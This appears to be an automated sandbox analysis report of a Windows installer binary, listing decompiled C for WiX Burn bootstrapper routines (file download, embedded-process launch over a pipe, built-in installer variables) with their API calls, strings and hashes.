                                                                                                                                                                  0x004253f3
                                                                                                                                                                  0x004253f3
                                                                                                                                                                  0x00425291
                                                                                                                                                                  0x00425293
                                                                                                                                                                  0x00425296
                                                                                                                                                                  0x0042529c
                                                                                                                                                                  0x0042529c
                                                                                                                                                                  0x0042529c
                                                                                                                                                                  0x0042529c
                                                                                                                                                                  0x004252a0
                                                                                                                                                                  0x004252a2
                                                                                                                                                                  0x004252a5
                                                                                                                                                                  0x004252ab
                                                                                                                                                                  0x004252ab
                                                                                                                                                                  0x004252ab
                                                                                                                                                                  0x004252ab
                                                                                                                                                                  0x004252af
                                                                                                                                                                  0x004252de
                                                                                                                                                                  0x004252e0
                                                                                                                                                                  0x004252e2
                                                                                                                                                                  0x00425388
                                                                                                                                                                  0x0042538d
                                                                                                                                                                  0x00425390
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004252e8
                                                                                                                                                                  0x004252e8
                                                                                                                                                                  0x004252eb
                                                                                                                                                                  0x004252ee
                                                                                                                                                                  0x004252f1
                                                                                                                                                                  0x004252f3
                                                                                                                                                                  0x00425313
                                                                                                                                                                  0x00425313
                                                                                                                                                                  0x00425316
                                                                                                                                                                  0x00425316
                                                                                                                                                                  0x00425318
                                                                                                                                                                  0x0042531a
                                                                                                                                                                  0x0042531d
                                                                                                                                                                  0x0042531d
                                                                                                                                                                  0x0042533f
                                                                                                                                                                  0x00425341
                                                                                                                                                                  0x00425343
                                                                                                                                                                  0x00425373
                                                                                                                                                                  0x00425378
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425345
                                                                                                                                                                  0x00425345
                                                                                                                                                                  0x00425347
                                                                                                                                                                  0x0042534a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042534c
                                                                                                                                                                  0x0042534f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042534f
                                                                                                                                                                  0x00425343
                                                                                                                                                                  0x004252f5
                                                                                                                                                                  0x004252f7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004252fe
                                                                                                                                                                  0x00425303
                                                                                                                                                                  0x00425305
                                                                                                                                                                  0x00425357
                                                                                                                                                                  0x0042535a
                                                                                                                                                                  0x0042535d
                                                                                                                                                                  0x0042535f
                                                                                                                                                                  0x00425362
                                                                                                                                                                  0x00425365
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425365
                                                                                                                                                                  0x00425307
                                                                                                                                                                  0x0042530a
                                                                                                                                                                  0x0042530d
                                                                                                                                                                  0x00425310
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425310
                                                                                                                                                                  0x00425262
                                                                                                                                                                  0x00425262
                                                                                                                                                                  0x00425265
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042526b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042526d
                                                                                                                                                                  0x00425270
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425270
                                                                                                                                                                  0x00425252
                                                                                                                                                                  0x00425206
                                                                                                                                                                  0x00425215
                                                                                                                                                                  0x00425217
                                                                                                                                                                  0x0042521f
                                                                                                                                                                  0x00425221
                                                                                                                                                                  0x0042522f
                                                                                                                                                                  0x00425234
                                                                                                                                                                  0x00425239
                                                                                                                                                                  0x0042523a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425240
                                                                                                                                                                  0x004251b8
                                                                                                                                                                  0x004251c2
                                                                                                                                                                  0x004251d0
                                                                                                                                                                  0x004251de
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,75C08550,?,000000FF,?,?,?,00000078), ref: 00425199
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004251A7
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 004251F9
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00425206
                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004253D8
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004253E7
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate buffer to download files into., xrefs: 00425234
                                                                                                                                                                  • Failed to allocate range request header., xrefs: 00425398
                                                                                                                                                                  • Failed to request URL for download: %ls, xrefs: 00425382
                                                                                                                                                                  • Failed to create download destination file: %ls, xrefs: 004251D8
                                                                                                                                                                  • Failed while reading from internet and writing to: %ls, xrefs: 0042536D
                                                                                                                                                                  • GET, xrefs: 004252C7
                                                                                                                                                                  • downloadengine.cpp, xrefs: 004251CB, 0042522A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                                  • String ID: Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$downloadengine.cpp
                                                                                                                                                                  • API String ID: 2028584396-2629732388
                                                                                                                                                                  • Opcode ID: 9bec20693969e32678d76742f50d6da2b1bbe1926a9e00ad939a083eef6a7e7d
                                                                                                                                                                  • Instruction ID: a77fca3a0050e094e7fd5a0dc6c4e55ac37b9c980704523f26a7d8da070f9359
                                                                                                                                                                  • Opcode Fuzzy Hash: 9bec20693969e32678d76742f50d6da2b1bbe1926a9e00ad939a083eef6a7e7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 5381A031A00629ABDF11DFA5DD45BAE77B4EF48354F51211AFE01B6280D778DD408BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00424468, Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 182processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                  			E00424468(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _SECURITY_ATTRIBUTES* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v48;
				long _v52;
				char _v56;
				void _v60;
				struct _SECURITY_ATTRIBUTES* _v64;
				char _v68;
				struct _STARTUPINFOW _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t53;
				signed short _t73;
				signed short _t91;
				long _t95;
				void* _t96;
				void* _t97;
				signed int _t98;
				void* _t104;
				void* _t105;
				signed short _t112;
				signed short _t113;
				signed short _t116;
				void* _t122;

				_t122 = __eflags;
				_t104 = __edx;
				_t97 = __ecx;
				_t53 = GetCurrentProcessId();
				_push(0x44);
				_t95 = _t53;
				_push(0);
				_push( &_v136);
				_v8 = 0;
				_v12 = 0;
				E004267C0(_t95, _t97, _t105, 0, _t122);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t98 = 6;
				memset( &_v60, 0, _t98 << 2);
				_v68 = 0;
				_v64 = 0;
				E0040F14D( &_v60);
				_v36 = 0;
				_v36 = _a12;
				_v32 = 0;
				_v32 = _a16;
				if(E0040F1D5(_t95, _t104,  &_v60,  &_v56) >= 0) {
					_t112 = E0040F31A( &_v60, 0,  &_v8);
					__eflags = _t112;
					if(_t112 >= 0) {
						_push(_t95);
						_push(_v56);
						_push(_v60);
						_push(L"burn.embedded");
						_t112 = E00433CEA( &_v12, L"%ls -%ls %ls %ls %u", _a8);
						__eflags = _t112;
						if(_t112 >= 0) {
							_t96 = 0;
							_t73 = CreateProcessW(_a4, _v12, 0, 0, 0, 0x8000000, 0, 0,  &_v136,  &_v28);
							__eflags = _t73;
							if(_t73 != 0) {
								_v52 = GetProcessId(_v28.hProcess);
								_v48 = _v28.hProcess;
								_v28.hProcess = 0;
								_t113 = E0040F9DC( &_v60);
								__eflags = _t113;
								if(_t113 >= 0) {
									_t113 = E0040F6A6(0, _v44, E004243CC,  &_v36,  &_v68);
									__eflags = _t113;
									if(_t113 >= 0) {
										_t113 = E00431FB6(0, _v48, 0xffffffff, _a20);
										__eflags = _t113;
										if(_t113 < 0) {
											_push(_a4);
											_push("Failed to wait for embedded executable: %ls");
											goto L16;
										}
									} else {
										_push("Failed to process messages from embedded message.");
										goto L13;
									}
								} else {
									_push("Failed to wait for embedded process to connect to pipe.");
									L13:
									_push(_t113);
									E00430A57();
								}
							} else {
								_t91 = GetLastError();
								__eflags = _t91;
								_t116 =  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000;
								__eflags = _t116;
								_t113 =  >=  ? 0x80004005 : _t116;
								E004300D9(0x80004005, "embedded.cpp", 0x59, _t113);
								_push(_a4);
								_push("Failed to create embedded process atpath: %ls");
								L16:
								_push(_t113);
								E00430A57();
							}
						} else {
							_push("Failed to allocate embedded command.");
							goto L6;
						}
					} else {
						_push("Failed to create embedded pipe.");
						goto L6;
					}
				} else {
					_push("Failed to create embedded pipe name and client token.");
					L6:
					_push(_t112);
					E00430A57();
					_t96 = 0;
				}
				if(_v28.hThread != 0) {
					CloseHandle(_v28.hThread);
					_v28.hThread = _t96;
				}
				if(_v28.hProcess != 0) {
					CloseHandle(_v28.hProcess);
					_v28 = _t96;
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				if(_v8 != 0) {
					CloseHandle(_v8);
					_v8 = _t96;
				}
				E0040F16A( &_v60);
				return _t113;
			}
































                                                                                                                                                                  0x00424468
                                                                                                                                                                  0x00424468
                                                                                                                                                                  0x00424468
                                                                                                                                                                  0x00424474
                                                                                                                                                                  0x0042447c
                                                                                                                                                                  0x0042447e
                                                                                                                                                                  0x00424486
                                                                                                                                                                  0x00424487
                                                                                                                                                                  0x00424488
                                                                                                                                                                  0x0042448b
                                                                                                                                                                  0x0042448e
                                                                                                                                                                  0x00424498
                                                                                                                                                                  0x00424499
                                                                                                                                                                  0x0042449a
                                                                                                                                                                  0x0042449e
                                                                                                                                                                  0x004244a1
                                                                                                                                                                  0x004244a7
                                                                                                                                                                  0x004244ad
                                                                                                                                                                  0x004244b0
                                                                                                                                                                  0x004244b3
                                                                                                                                                                  0x004244bb
                                                                                                                                                                  0x004244be
                                                                                                                                                                  0x004244c4
                                                                                                                                                                  0x004244c7
                                                                                                                                                                  0x004244db
                                                                                                                                                                  0x004244f3
                                                                                                                                                                  0x004244f5
                                                                                                                                                                  0x004244f7
                                                                                                                                                                  0x00424500
                                                                                                                                                                  0x00424501
                                                                                                                                                                  0x00424507
                                                                                                                                                                  0x0042450a
                                                                                                                                                                  0x0042451d
                                                                                                                                                                  0x00424522
                                                                                                                                                                  0x00424524
                                                                                                                                                                  0x0042453e
                                                                                                                                                                  0x00424557
                                                                                                                                                                  0x0042455d
                                                                                                                                                                  0x0042455f
                                                                                                                                                                  0x0042459f
                                                                                                                                                                  0x004245a5
                                                                                                                                                                  0x004245ac
                                                                                                                                                                  0x004245b4
                                                                                                                                                                  0x004245b6
                                                                                                                                                                  0x004245b8
                                                                                                                                                                  0x004245d6
                                                                                                                                                                  0x004245d8
                                                                                                                                                                  0x004245da
                                                                                                                                                                  0x004245f8
                                                                                                                                                                  0x004245fa
                                                                                                                                                                  0x004245fc
                                                                                                                                                                  0x004245fe
                                                                                                                                                                  0x00424601
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424601
                                                                                                                                                                  0x004245dc
                                                                                                                                                                  0x004245dc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004245dc
                                                                                                                                                                  0x004245ba
                                                                                                                                                                  0x004245ba
                                                                                                                                                                  0x004245e1
                                                                                                                                                                  0x004245e1
                                                                                                                                                                  0x004245e2
                                                                                                                                                                  0x004245e8
                                                                                                                                                                  0x00424561
                                                                                                                                                                  0x00424561
                                                                                                                                                                  0x00424570
                                                                                                                                                                  0x00424572
                                                                                                                                                                  0x0042457a
                                                                                                                                                                  0x0042457c
                                                                                                                                                                  0x00424587
                                                                                                                                                                  0x0042458c
                                                                                                                                                                  0x0042458f
                                                                                                                                                                  0x00424606
                                                                                                                                                                  0x00424606
                                                                                                                                                                  0x00424607
                                                                                                                                                                  0x0042460c
                                                                                                                                                                  0x00424526
                                                                                                                                                                  0x00424526
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424526
                                                                                                                                                                  0x004244f9
                                                                                                                                                                  0x004244f9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004244f9
                                                                                                                                                                  0x004244dd
                                                                                                                                                                  0x004244dd
                                                                                                                                                                  0x0042452b
                                                                                                                                                                  0x0042452b
                                                                                                                                                                  0x0042452c
                                                                                                                                                                  0x00424533
                                                                                                                                                                  0x00424533
                                                                                                                                                                  0x00424619
                                                                                                                                                                  0x0042461e
                                                                                                                                                                  0x00424620
                                                                                                                                                                  0x00424620
                                                                                                                                                                  0x00424627
                                                                                                                                                                  0x0042462c
                                                                                                                                                                  0x0042462e
                                                                                                                                                                  0x0042462e
                                                                                                                                                                  0x00424635
                                                                                                                                                                  0x0042463a
                                                                                                                                                                  0x0042463a
                                                                                                                                                                  0x00424643
                                                                                                                                                                  0x00424648
                                                                                                                                                                  0x0042464a
                                                                                                                                                                  0x0042464a
                                                                                                                                                                  0x00424651
                                                                                                                                                                  0x0042465c

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(751461D0,00000001,00000000), ref: 00424474
                                                                                                                                                                    • Part of subcall function 0040F1D5: UuidCreate.RPCRT4(?), ref: 0040F208
                                                                                                                                                                    • Part of subcall function 0040F1D5: StringFromGUID2.OLE32(?,0041652F,00000027), ref: 0040F225
                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 00424557
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 00424561
                                                                                                                                                                  • GetProcessId.KERNEL32(004198DC,?,?,00000000,?,?,?,?), ref: 00424599
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,004198DC,?,004243CC,?,?,?,?,?,00000000,?,?,?,?), ref: 0042461E
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,004198DC,?,004243CC,?,?,?,?,?,00000000,?,?,?,?), ref: 0042462C
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,004198DC,?,004243CC,?,?,?,?,?,00000000,?,?,?,?), ref: 00424648
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create embedded pipe name and client token., xrefs: 004244DD
                                                                                                                                                                  • Failed to create embedded process atpath: %ls, xrefs: 0042458F
                                                                                                                                                                  • Failed to create embedded pipe., xrefs: 004244F9
                                                                                                                                                                  • Failed to wait for embedded process to connect to pipe., xrefs: 004245BA
                                                                                                                                                                  • %ls -%ls %ls %ls %u, xrefs: 00424512
                                                                                                                                                                  • Failed to wait for embedded executable: %ls, xrefs: 00424601
                                                                                                                                                                  • Failed to allocate embedded command., xrefs: 00424526
                                                                                                                                                                  • Failed to process messages from embedded message., xrefs: 004245DC
                                                                                                                                                                  • burn.embedded, xrefs: 0042450A
                                                                                                                                                                  • embedded.cpp, xrefs: 00424582
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleProcess$Create$CurrentErrorFromLastStringUuid
                                                                                                                                                                  • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process atpath: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                                                                  • API String ID: 1512633446-740426173
                                                                                                                                                                  • Opcode ID: fbd4795c8cad67875efc4afb993767a5f9e8bad3f0531e06cec0b6a54e32c457
                                                                                                                                                                  • Instruction ID: 769935e6c64afea5e7f2a1e5b32793c05a236408841bfab0bfe56f25796ca669
                                                                                                                                                                  • Opcode Fuzzy Hash: fbd4795c8cad67875efc4afb993767a5f9e8bad3f0531e06cec0b6a54e32c457
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C513072E00229BBDF11AFA5EC41ADEBAB8EF48714F104127FA00B6150D7789A458BD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403D71, Relevance: 28.8, APIs: 1, Strings: 18, Instructions: 299COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00403D71(struct _CRITICAL_SECTION* _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char* _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char* _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				char* _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				char* _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				char* _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				char* _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				char* _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char* _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				char* _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				char* _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				char* _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				char* _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				char* _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				char* _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				char* _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				char* _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				char* _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				char* _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				char* _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				char* _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				char* _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				char* _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				char* _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				char* _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				char* _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				char* _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				char* _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				char* _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				char* _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				char* _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				char* _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				char* _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				char* _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				char* _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				char* _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				char* _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				char* _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				char* _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				char* _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				char* _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				char* _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				char* _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				char* _v904;
				intOrPtr _v908;
				char _v912;
				intOrPtr _v916;
				char* _v920;
				struct _CRITICAL_SECTION* _v924;
				void* __edi;
				void* __esi;
				signed int _t239;
				struct _CRITICAL_SECTION* _t241;
				intOrPtr _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				void* _t250;
				intOrPtr _t255;
				intOrPtr _t257;
				intOrPtr _t258;
				intOrPtr _t260;
				intOrPtr _t264;
				intOrPtr _t268;
				intOrPtr* _t269;
				intOrPtr _t270;
				signed int _t271;

				_t239 =  *0x4560d0; // 0xae480e18
				_v8 = _t239 ^ _t271;
				_t241 = _a4;
				_v924 = _t241;
				InitializeCriticalSection(_t241);
				_t270 = 0;
				_t242 = 0x2b;
				_t257 = 6;
				_v920 = L"AdminToolsFolder";
				_v916 = E0040291F;
				_v912 = 0x30;
				_v908 = 0;
				_v904 = L"AppDataFolder";
				_v900 = E0040291F;
				_v896 = 0x1a;
				_v892 = 0;
				_v888 = L"CommonAppDataFolder";
				_v884 = E0040291F;
				_v880 = 0x23;
				_v876 = 0;
				_v872 = L"CommonFiles64Folder";
				_v868 = E00402E54;
				_v864 = _t242;
				_v860 = 0;
				_v856 = L"CommonFilesFolder";
				_v852 = E0040291F;
				_v848 = _t242;
				_v844 = 0;
				_v840 = L"CommonFiles6432Folder";
				_v836 = E004027E9;
				_v832 = _t242;
				_v828 = 0;
				_v824 = L"CompatibilityMode";
				_v820 = E00402BF0;
				_v816 = 0xc;
				_v812 = 0;
				_v808 = L"Date";
				_v804 = E00402986;
				_v800 = 0;
				_v796 = 0;
				_v792 = L"ComputerName";
				_v788 = E00402881;
				_v784 = 0;
				_v780 = 0;
				_v776 = L"DesktopFolder";
				_v772 = E0040291F;
				_v768 = 0;
				_v764 = 0;
				_v760 = L"FavoritesFolder";
				_v756 = E0040291F;
				_v752 = _t257;
				_v748 = 0;
				_v744 = L"FontsFolder";
				_v740 = E0040291F;
				_v736 = 0x14;
				_v732 = 0;
				_v728 = L"InstallerName";
				_v724 = E00402A9F;
				_v720 = 0;
				_v716 = 0;
				_v712 = L"InstallerVersion";
				_v708 = E00402ACC;
				_v704 = 0;
				_v700 = 0;
				_v696 = L"LocalAppDataFolder";
				_v692 = E0040291F;
				_v688 = 0x1c;
				_v684 = 0;
				_v680 = L"LogonUser";
				_v676 = E00402B28;
				_v672 = 0;
				_v668 = 0;
				_v664 = L"MyPicturesFolder";
				_v660 = E0040291F;
				_t243 = 5;
				_t255 = 7;
				_v608 = _t257;
				_t258 = 9;
				_v644 = E00402BF0;
				_v628 = E00402BF0;
				_v612 = E00402BF0;
				_v596 = E00402BF0;
				_v580 = E00402BF0;
				_v564 = E00402BF0;
				_v548 = E00402BF0;
				_v532 = E00402BF0;
				_t264 = 0xb;
				_v624 = _t243;
				_v512 = _t243;
				_t244 = 0x26;
				_v480 = _t244;
				_v464 = _t244;
				_v452 = E004027E9;
				_v448 = _t244;
				_t268 = 2;
				_v560 = _t258;
				_v400 = _t258;
				_v656 = 0x27;
				_v652 = 0;
				_v648 = L"NTProductType";
				_v640 = 4;
				_v636 = 0;
				_v632 = L"NTSuiteBackOffice";
				_v620 = 0;
				_v616 = L"NTSuiteDataCenter";
				_v604 = 0;
				_v600 = L"NTSuiteEnterprise";
				_v592 = E0040291F;
				_v588 = 0;
				_v584 = L"NTSuitePersonal";
				_v576 = 8;
				_v572 = 0;
				_v568 = L"NTSuiteSmallBusiness";
				_v556 = 0;
				_v552 = L"NTSuiteSmallBusinessRestricted";
				_v544 = 0xa;
				_v540 = 0;
				_v536 = L"NTSuiteWebServer";
				_v528 = E00402BF0;
				_v524 = 0;
				_v520 = L"PersonalFolder";
				_v516 = E0040291F;
				_v508 = 0;
				_v504 = L"Privileged";
				_v500 = E00402DA0;
				_v496 = 0;
				_v492 = 0;
				_v488 = L"ProgramFiles64Folder";
				_v484 = E00402E54;
				_v476 = 0;
				_v472 = L"ProgramFilesFolder";
				_v468 = E0040291F;
				_v460 = 0;
				_v456 = L"ProgramFiles6432Folder";
				_v444 = 0;
				_v440 = L"ProgramMenuFolder";
				_v436 = E0040291F;
				_v432 = E004027E9;
				_v428 = 0;
				_v424 = L"RebootPending";
				_v420 = E00402DE7;
				_v416 = 0;
				_v412 = 0;
				_v408 = L"SendToFolder";
				_v404 = E0040291F;
				_v396 = 0;
				_v392 = L"ServicePackLevel";
				_v372 = E0040291F;
				_v356 = E0040291F;
				_v340 = E00402EF0;
				_v324 = E00402EF0;
				_v368 = _t264;
				_v388 = E004031B4;
				_v276 = E0040291F;
				_v212 = E004031B4;
				_v196 = E004031B4;
				_v180 = E0040291F;
				_t260 = E00402EC5;
				_v384 = 3;
				_v380 = 0;
				_v376 = L"StartMenuFolder";
				_v364 = 0;
				_v360 = L"StartupFolder";
				_v352 = _t255;
				_v348 = 0;
				_v344 = L"SystemFolder";
				_v336 = 0;
				_v332 = 0;
				_v328 = L"System64Folder";
				_v320 = 1;
				_v316 = 0;
				_v312 = L"SystemLanguageID";
				_v308 = E00402785;
				_v304 = 0;
				_v300 = 0;
				_v296 = L"TempFolder";
				_v292 = E00403017;
				_v288 = 0;
				_v284 = 0;
				_v280 = L"TemplateFolder";
				_v272 = 0x15;
				_v268 = 0;
				_v264 = L"TerminalServer";
				_v260 = E00402BF0;
				_v256 = 0xd;
				_v252 = 0;
				_v248 = L"UserLanguageID";
				_v244 = E004027B7;
				_v240 = 0;
				_v236 = 0;
				_v232 = L"VersionMsi";
				_v228 = E004030ED;
				_v224 = 0;
				_v220 = 0;
				_v216 = L"VersionNT";
				_v208 = 1;
				_v204 = 0;
				_v200 = L"VersionNT64";
				_v192 = _t268;
				_v188 = 0;
				_v184 = L"WindowsFolder";
				_v176 = 0x24;
				_v172 = 0;
				_v168 = L"WindowsVolume";
				_v164 = E0040337E;
				_v160 = 0;
				_v156 = 0;
				_v152 = L"WixBundleAction";
				_v148 = E00402BC5;
				_v144 = 0;
				_v140 = 0;
				_v136 = L"WixBundleForcedRestartPackage";
				_v132 = E00402EC5;
				_v128 = 0;
				_v124 = 1;
				_v120 = L"WixBundleInstalled";
				_v116 = E00402BC5;
				_v112 = 0;
				_v108 = 0;
				_v104 = L"WixBundleElevated";
				_v100 = E00402BC5;
				_v96 = 0;
				_v92 = 0;
				_v88 = L"WixBundleActiveParent";
				_v84 = E00402EC5;
				_v80 = 0;
				_v76 = 0;
				_v72 = L"WixBundleProviderKey";
				_v68 = E00402EC5;
				_v64 = 0x43b580;
				_v60 = 0;
